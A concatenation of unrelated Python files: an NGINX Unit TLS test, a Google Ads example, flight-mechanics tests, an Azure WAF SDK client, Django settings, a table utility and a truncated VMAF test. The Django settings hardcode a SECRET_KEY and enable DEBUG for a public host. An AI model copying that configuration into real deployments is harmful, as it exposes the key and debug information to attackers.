def dg(self) -> "streamlit.delta_generator.DeltaGenerator":
"""Get our DeltaGenerator."""
return cast("streamlit.delta_generator.DeltaGenerator", self)
|
py | b414b5a0ed5c9c8b52b9f2d3d3d13eabb231f283 | import ssl
import pytest
from unit.applications.tls import TestApplicationTLS
class TestTLSConfCommand(TestApplicationTLS):
prerequisites = {'modules': {'openssl': 'any'}}
@pytest.fixture(autouse=True)
def setup_method_fixture(self, request):
self.certificate()
assert 'success' in self.conf(
{
"listeners": {
"*:7080": {
"pass": "routes",
"tls": {"certificate": "default"},
}
},
"routes": [{"action": {"return": 200}}],
"applications": {},
}
), 'load application configuration'
def test_tls_conf_command(self):
def check_no_connection():
try:
self.get_ssl()
pytest.fail('Unexpected connection.')
except (ssl.SSLError, ConnectionRefusedError):
pass
# Set one conf_commands (disable protocol).
(resp, sock) = self.get_ssl(start=True)
shared_ciphers = sock.shared_ciphers()
protocols = list(set(c[1] for c in shared_ciphers))
protocol = sock.cipher()[1]
if '/' in protocol:
pytest.skip('Complex protocol format.')
assert 'success' in self.conf(
{
"certificate": "default",
"conf_commands": {"protocol": '-' + protocol},
},
'listeners/*:7080/tls',
), 'protocol disabled'
sock.close()
if len(protocols) > 1:
(resp, sock) = self.get_ssl(start=True)
cipher = sock.cipher()
assert cipher[1] != protocol, 'new protocol used'
shared_ciphers = sock.shared_ciphers()
ciphers = list(set(c for c in shared_ciphers if c[1] == cipher[1]))
sock.close()
else:
check_no_connection()
pytest.skip('One TLS protocol available only.')
# Set two conf_commands (disable protocol and cipher).
assert 'success' in self.conf(
{
"certificate": "default",
"conf_commands": {
"protocol": '-' + protocol,
"cipherstring": cipher[1] + ":!" + cipher[0],
},
},
'listeners/*:7080/tls',
), 'cipher disabled'
if len(ciphers) > 1:
(resp, sock) = self.get_ssl(start=True)
cipher_new = sock.cipher()
assert cipher_new[1] == cipher[1], 'previous protocol used'
assert cipher_new[0] != cipher[0], 'new cipher used'
sock.close()
else:
check_no_connection()
def test_tls_conf_command_invalid(self, skip_alert):
skip_alert(r'SSL_CONF_cmd', r'failed to apply new conf')
def check_conf_commands(conf_commands):
assert 'error' in self.conf(
{"certificate": "default", "conf_commands": conf_commands},
'listeners/*:7080/tls',
            ), 'invalid conf_commands'
check_conf_commands([])
check_conf_commands("blah")
check_conf_commands({"": ""})
check_conf_commands({"blah": ""})
check_conf_commands({"protocol": {}})
check_conf_commands({"protocol": "blah"})
check_conf_commands({"protocol": "TLSv1.2", "blah": ""})
|
py | b414b5ec34b22905abd54a77d573319df3bb29e3 | #!/usr/bin/env python
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Demonstrates how to reject or unlink a Merchant Center link request.
Prerequisite: You need to have access to a Merchant Center account. You can find
instructions to create a Merchant Center account here:
https://support.google.com/merchants/answer/188924.
To run this example, you must use the Merchant Center UI or the Content API for
Shopping to send a link request between your Merchant Center and Google Ads
accounts. You can find detailed instructions to link your Merchant Center and
Google Ads accounts here: https://support.google.com/merchants/answer/6159060.
"""
import argparse
import sys
from google.ads.google_ads.client import GoogleAdsClient
from google.ads.google_ads.errors import GoogleAdsException
def main(client, customer_id, merchant_center_account_id):
"""Demonstrates how to reject a Merchant Center link request.
Args:
client: An initialized Google Ads client.
customer_id: The Google Ads customer ID.
merchant_center_account_id: The Merchant Center account ID for the
account requesting to link.
"""
# Get the MerchantCenterLinkService client.
merchant_center_link_service = client.get_service(
"MerchantCenterLinkService", version="v6"
)
try:
# Get the extant customer account to Merchant Center account links.
list_merchant_center_links_response = merchant_center_link_service.list_merchant_center_links(
customer_id
)
number_of_links = len(
list_merchant_center_links_response.merchant_center_links
)
if number_of_links <= 0:
print(
"There are no current merchant center links to Google Ads "
f"account {customer_id}. This example will now exit."
)
return
print(
f"{number_of_links} Merchant Center link(s) found with the "
"following details:"
)
merchant_center_link_status_enum = client.get_type(
"MerchantCenterLinkStatusEnum", version="v6"
).MerchantCenterLinkStatus
for (
merchant_center_link
) in list_merchant_center_links_response.merchant_center_links:
print(
f"\tLink '{merchant_center_link.resource_name}' has status "
f"'{merchant_center_link_status_enum.Name(merchant_center_link.status)}'."
)
# Check if this is the link to the target Merchant Center account.
if merchant_center_link.id == merchant_center_account_id:
# A Merchant Center link can be pending or enabled; in both
# cases, we reject it by removing the link.
_remove_merchant_center_link(
client,
merchant_center_link_service,
customer_id,
merchant_center_link,
)
# We can terminate early since this example concerns only one
# Google Ads account to Merchant Center account link.
return
# Raise an exception if no matching Merchant Center link was found.
raise ValueError(
"No link could was found between Google Ads account "
f"{customer_id} and Merchant Center account "
f"{merchant_center_account_id}."
)
except GoogleAdsException as ex:
print(
f'Request with ID "{ex.request_id}" failed with status '
f'"{ex.error.code().name}" and includes the following errors:'
)
for error in ex.failure.errors:
print(f'\tError with message "{error.message}".')
if error.location:
for field_path_element in error.location.field_path_elements:
print(f"\t\tOn field: {field_path_element.field_name}")
sys.exit(1)
def _remove_merchant_center_link(
client, merchant_center_link_service, customer_id, merchant_center_link
):
"""Removes a Merchant Center link from a Google Ads client customer account.
Args:
client: An initialized Google Ads client.
merchant_center_link_service: An initialized
MerchantCenterLinkService client.
customer_id: The Google Ads customer ID of the account that has the link
request.
merchant_center_link: The MerchantCenterLink object to remove.
"""
# Create a single remove operation, specifying the Merchant Center link
# resource name.
operation = client.get_type("MerchantCenterLinkOperation", version="v6")
operation.remove = merchant_center_link.resource_name
# Send the operation in a mutate request.
response = merchant_center_link_service.mutate_merchant_center_link(
customer_id, operation
)
print(
"Removed Merchant Center link with resource name "
f"'{response.result.resource_name}'."
)
if __name__ == "__main__":
# GoogleAdsClient will read the google-ads.yaml configuration file in the
# home directory if none is specified.
google_ads_client = GoogleAdsClient.load_from_storage()
parser = argparse.ArgumentParser(
description=(
"Demonstrates how to reject a Merchant Center link request."
)
)
# The following argument(s) should be provided to run the example.
parser.add_argument(
"-c",
"--customer_id",
type=str,
required=True,
help="The Google Ads customer ID.",
)
parser.add_argument(
"-m",
"--merchant_center_account_id",
type=int,
required=True,
help="The Merchant Center account ID for the account requesting to "
"link.",
)
args = parser.parse_args()
main(google_ads_client, args.customer_id, args.merchant_center_account_id)
|
py | b414b67cd4c47ebca38c1e20f61ee2d0c92caa02 | # -*- coding: utf-8 -*-
"""
Python Flight Mechanics Engine (PyFME).
Copyright (c) AeroPython Development Team.
Distributed under the terms of the MIT License.
TAS CAS EAS conversion test functions
-------------------------------------
"""
from numpy.testing import (assert_almost_equal)
from pyfme.utils.anemometry import (tas2eas, eas2tas, cas2eas, eas2cas,
tas2cas, cas2tas)
from pyfme.models.constants import RHO_0, P_0
from pyfme.environment.atmosphere import ISA1976
atmosphere = ISA1976()
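# For reference, the standard relations these tests exercise (textbook definitions,
# not taken from pyfme itself):
#   EAS = TAS * sqrt(rho / RHO_0)
#   CAS follows from the impact (pitot) pressure via the subsonic compressible
#   relation q_c = p * ((1 + 0.2 * M**2)**3.5 - 1), evaluated with sea-level
#   constants, so TAS <-> CAS conversions need both static pressure and density.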
def test_tas2eas():
# sea level
tas = 275
eas_expected = 275
eas = tas2eas(tas, RHO_0)
assert_almost_equal(eas, eas_expected)
# Test at 11000m
_, _, rho, _ = atmosphere(11000)
tas = 275
eas_expected = 149.88797172756003
eas = tas2eas(tas, rho)
assert_almost_equal(eas, eas_expected)
def test_eas2tas():
# sea level
eas = 149.88797172756003
tas_expected = 149.88797172756003
tas = eas2tas(eas, RHO_0)
assert_almost_equal(tas, tas_expected)
# Test at 11000m
_, _, rho, _ = atmosphere(11000)
eas = 149.88797172756003
tas_expected = 275
tas = eas2tas(eas, rho)
assert_almost_equal(tas, tas_expected)
def test_tas2cas():
# sea level
tas = 275
cas_expected = 275
cas = tas2cas(tas, P_0, RHO_0)
assert_almost_equal(cas, cas_expected)
# Test at 11000m
_, p, rho, _ = atmosphere(11000)
tas = 275
cas_expected = 162.03569680495048
cas = tas2cas(tas, p, rho)
assert_almost_equal(cas, cas_expected)
def test_cas2tas():
# sea level
cas = 275
tas_expected = 275
tas = cas2tas(cas, P_0, RHO_0)
assert_almost_equal(tas, tas_expected)
# Test at 11000m
_, p, rho, _ = atmosphere(11000)
cas = 162.03569680495048
tas_expected = 275
tas = cas2tas(cas, p, rho)
assert_almost_equal(tas, tas_expected)
def test_cas2eas():
# sea level
cas = 275
eas_expected = 275
eas = cas2eas(cas, P_0, RHO_0)
assert_almost_equal(eas, eas_expected)
# Test at 11000m
_, p, rho, _ = atmosphere(11000)
cas = 162.03569680495048
eas_expected = 149.88797172756003
eas = cas2eas(cas, p, rho)
assert_almost_equal(eas, eas_expected)
def test_eas2cas():
# sea level
eas = 275
cas_expected = 275
cas = eas2cas(eas, P_0, RHO_0)
assert_almost_equal(cas, cas_expected)
# Test at 11000m
_, p, rho, _ = atmosphere(11000)
eas = 149.88797172756003
cas_expected = 162.03569680495048
cas = eas2cas(eas, p, rho)
assert_almost_equal(cas, cas_expected)
|
py | b414b7e604de5c0554349ade773a54d4b69b8ad8 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class WebApplicationFirewallPoliciesOperations:
"""WebApplicationFirewallPoliciesOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2019_08_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list(
self,
resource_group_name: str,
**kwargs
) -> AsyncIterable["_models.WebApplicationFirewallPolicyListResult"]:
"""Lists all of the protection policies within a resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either WebApplicationFirewallPolicyListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2019_08_01.models.WebApplicationFirewallPolicyListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.WebApplicationFirewallPolicyListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-08-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('WebApplicationFirewallPolicyListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies'} # type: ignore
def list_all(
self,
**kwargs
) -> AsyncIterable["_models.WebApplicationFirewallPolicyListResult"]:
"""Gets all the WAF policies in a subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either WebApplicationFirewallPolicyListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2019_08_01.models.WebApplicationFirewallPolicyListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.WebApplicationFirewallPolicyListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-08-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_all.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('WebApplicationFirewallPolicyListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_all.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies'} # type: ignore
async def get(
self,
resource_group_name: str,
policy_name: str,
**kwargs
) -> "_models.WebApplicationFirewallPolicy":
"""Retrieve protection policy with specified name within a resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param policy_name: The name of the policy.
:type policy_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: WebApplicationFirewallPolicy, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2019_08_01.models.WebApplicationFirewallPolicy
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.WebApplicationFirewallPolicy"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-08-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'policyName': self._serialize.url("policy_name", policy_name, 'str', max_length=128, min_length=0),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('WebApplicationFirewallPolicy', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies/{policyName}'} # type: ignore
async def create_or_update(
self,
resource_group_name: str,
policy_name: str,
parameters: "_models.WebApplicationFirewallPolicy",
**kwargs
) -> "_models.WebApplicationFirewallPolicy":
"""Creates or update policy with specified rule set name within a resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param policy_name: The name of the policy.
:type policy_name: str
:param parameters: Policy to be created.
:type parameters: ~azure.mgmt.network.v2019_08_01.models.WebApplicationFirewallPolicy
:keyword callable cls: A custom type or function that will be passed the direct response
:return: WebApplicationFirewallPolicy, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2019_08_01.models.WebApplicationFirewallPolicy
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.WebApplicationFirewallPolicy"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-08-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.create_or_update.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'policyName': self._serialize.url("policy_name", policy_name, 'str', max_length=128, min_length=0),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'WebApplicationFirewallPolicy')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('WebApplicationFirewallPolicy', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('WebApplicationFirewallPolicy', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies/{policyName}'} # type: ignore
async def _delete_initial(
self,
resource_group_name: str,
policy_name: str,
**kwargs
) -> None:
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-08-01"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'policyName': self._serialize.url("policy_name", policy_name, 'str', max_length=128, min_length=0),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies/{policyName}'} # type: ignore
async def begin_delete(
self,
resource_group_name: str,
policy_name: str,
**kwargs
) -> AsyncLROPoller[None]:
"""Deletes Policy.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param policy_name: The name of the policy.
:type policy_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: Pass in True if you'd like the AsyncARMPolling polling method,
False for no polling, or your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._delete_initial(
resource_group_name=resource_group_name,
policy_name=policy_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'policyName': self._serialize.url("policy_name", policy_name, 'str', max_length=128, min_length=0),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies/{policyName}'} # type: ignore
|
py | b414b8e66214ba33e08db8d62c683dfe4a785fb7 | import os
from pathlib import Path
BASE_DIR = Path(__file__).resolve().parent.parent
SECRET_KEY = 'django-insecure-0n7yvje91z!_l5f3kx=8#s7biqt*r+e58(y14q84b#g$c7j838'
DEBUG = True
ALLOWED_HOSTS = [
'localhost',
'127.0.0.1',
'[::1]',
'testserver',
'www.sertest2.pythonanywhere.com',
'sertest2.pythonanywhere.com',
]
AUTHENTICATION_BACKENDS = (
'users.authentication.EmailAuthBackend',
'django.contrib.auth.backends.ModelBackend',
)
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'api',
'rest_framework',
'sales_backend.apps.SalesBackendConfig',
'cart.apps.CartConfig',
'users.apps.UsersConfig',
'rest_framework.authtoken',
'orders.apps.OrdersConfig'
]
REST_FRAMEWORK = {
'DEFAULT_PERMISSION_CLASSES': [
'rest_framework.permissions.IsAuthenticated',
],
'DEFAULT_AUTHENTICATION_CLASSES': [
'rest_framework.authentication.TokenAuthentication',
]
}
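# With TokenAuthentication enabled above, API clients send an
# "Authorization: Token <key>" header; tokens can be issued per user via
# rest_framework.authtoken (e.g. its obtain_auth_token view or the admin).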
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'agro_site.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'agro_site.wsgi.application'
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': str(os.path.join(BASE_DIR, "db.sqlite3")),
}
}
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
LANGUAGE_CODE = 'ru-RU'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
STATICFILES_DIRS = [os.path.join(BASE_DIR, 'static')]
STATIC_URL = '/static/'
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
CART_SESSION_ID = 'cart'
LOGIN_URL = 'users:login'
LOGIN_REDIRECT_URL = 'sales_backend:index'
DEFAULT_FROM_EMAIL = '[email protected]'
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_HOST = 'smtp.sendgrid.net'
EMAIL_HOST_USER = 'apikey'
EMAIL_HOST_PASSWORD = os.environ.get('EMAIL_HOST_PASSWORD', '')  # supply via environment; avoid committing real API keys
EMAIL_PORT = 587
EMAIL_USE_TLS = True
|
py | b414b967c2d032bff3faee6fdd23361b4d59016a | import logging
from typing import Callable, Iterable, Dict, Any, Mapping, Optional
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
def bytes_to_str(num_bytes: float) -> str:
"""Return a number of bytes as a human-readable string."""
for unit in ("bytes", "KB", "MB", "GB"):
if num_bytes < 1024:
return f"{num_bytes:.1f} {unit}"
num_bytes /= 1024
return f"{num_bytes:.1f} TB"
def table(
headers: Iterable[str],
rows: Iterable[Iterable[Any]],
fill: str = "",
header_fmt: Optional[Callable[[str], str]] = None,
row_fmt: Optional[Callable[[str], str]] = None,
alignment: Optional[Dict[str, str]] = None,
) -> str:
"""
Return a string containing a simple table created from headers and rows of entries.
Parameters
----------
headers
The column headers for the table.
rows
The entries for each row, for each column.
Should be an iterable of iterables or mappings, with the outer level containing the rows,
and each inner iterable containing the entries for each column.
An iterable-type row is printed in order.
        A mapping-type row uses the headers as keys to align its entries and can have
        missing values, which are filled using the ``fill`` value.
fill
The string to print in place of a missing value in a mapping-type row.
header_fmt
A function to be called on the header string.
The return value is what will go in the output.
row_fmt
A function to be called on each row string.
The return value is what will go in the output.
alignment
A map of headers to string method names to use to align each column.
Returns
-------
table :
A string containing the table.
"""
if header_fmt is None:
header_fmt = lambda _: _
if row_fmt is None:
row_fmt = lambda _: _
if alignment is None:
alignment = {}
headers = tuple(headers)
lengths = [len(h) for h in headers]
align_methods = [alignment.get(h, "center") for h in headers]
processed_rows = []
for row in rows:
if isinstance(row, Mapping):
processed_rows.append([str(row.get(key, fill)) for key in headers])
else:
processed_rows.append([str(entry) for entry in row])
for row in processed_rows:
lengths = [max(curr, len(entry)) for curr, entry in zip(lengths, row)]
header = header_fmt(
" ".join(
getattr(h, a)(l) for h, l, a in zip(headers, lengths, align_methods)
).rstrip()
)
lines = (
row_fmt(
" ".join(getattr(f, a)(l) for f, l, a in zip(row, lengths, align_methods))
)
for row in processed_rows
)
output = "\n".join((header, *lines))
return output
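# Minimal usage sketch (added for illustration; the sample rows below are made up).
# It shows a mapping-type row with a missing "size" entry being filled with ``fill``
# and left-justification requested for the "name" column.
if __name__ == "__main__":
    print(
        table(
            headers=["name", "size"],
            rows=[
                ["model.bin", bytes_to_str(3 * 1024 * 1024)],
                {"name": "notes.txt"},
            ],
            fill="-",
            alignment={"name": "ljust"},
        )
    )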
|
py | b414b9e439652dcad4bb4d9114d332ff8ade3553 | import unittest
import numpy as np
from vmaf.core.asset import Asset
from vmaf.config import VmafConfig
from vmaf.core.vmafexec_feature_extractor import FloatMotionFeatureExtractor, IntegerMotionFeatureExtractor, \
FloatVifFeatureExtractor, FloatAdmFeatureExtractor, IntegerVifFeatureExtractor, IntegerPsnrFeatureExtractor, \
IntegerAdmFeatureExtractor, CIEDE2000FeatureExtractor
from test.testutil import set_default_576_324_videos_for_testing, \
set_default_576_324_12bit_videos_for_testing, \
set_default_576_324_16bit_videos_for_testing, \
set_default_576_324_10bit_videos_for_testing
class FeatureExtractorTest(unittest.TestCase):
def setUp(self):
self.verificationErrors = []
self.maxDiff = None
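        # self.verificationErrors acts as a soft-assertion buffer: the tests below
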